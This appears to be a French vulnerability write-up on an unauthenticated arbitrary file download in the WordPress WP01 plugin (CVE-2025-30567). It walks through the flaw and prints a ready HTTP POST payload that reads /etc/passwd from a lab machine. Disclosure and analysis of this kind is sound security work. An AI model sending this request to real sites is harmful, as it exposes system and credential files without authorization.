
Téléchargement non autorisé de fichier arbitraire dans WordPress WP01
Téléchargement arbitraire non autorisé de fichier dans WordPress WP01 !
Étape 1 : Télécharger le plugin WP01, mais...

Haha, ne vous inquiétez pas, voici le code source du plugin.
Étape 2 : Compressez le dossier wp01 fourni et téléchargez-le dans la section des plugins WordPress. Comme ceci -->

C'est simple—la vulnérabilité est déclenchée au point suivant :

Ensuite, vérifions où la méthode make_archive est appelée.

Deux hooks d'action AJAX sont présents—un pour les utilisateurs connectés et un autre pour les utilisateurs non connectés. C'est la raison de la vulnérabilité d'accès non autorisé.
Très bien, maintenant construisons la charge utile pour lire le contenu de /etc/passwd sur la machine locale.
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
target=passwd&path=/etc/
résultats :


OK, ensuite, téléchargez ce fichier wp-01-passwd.zip.

Écrit sur la base de Pocsuite3, voir Poc_CVE-2025-30567.py pour les détails.
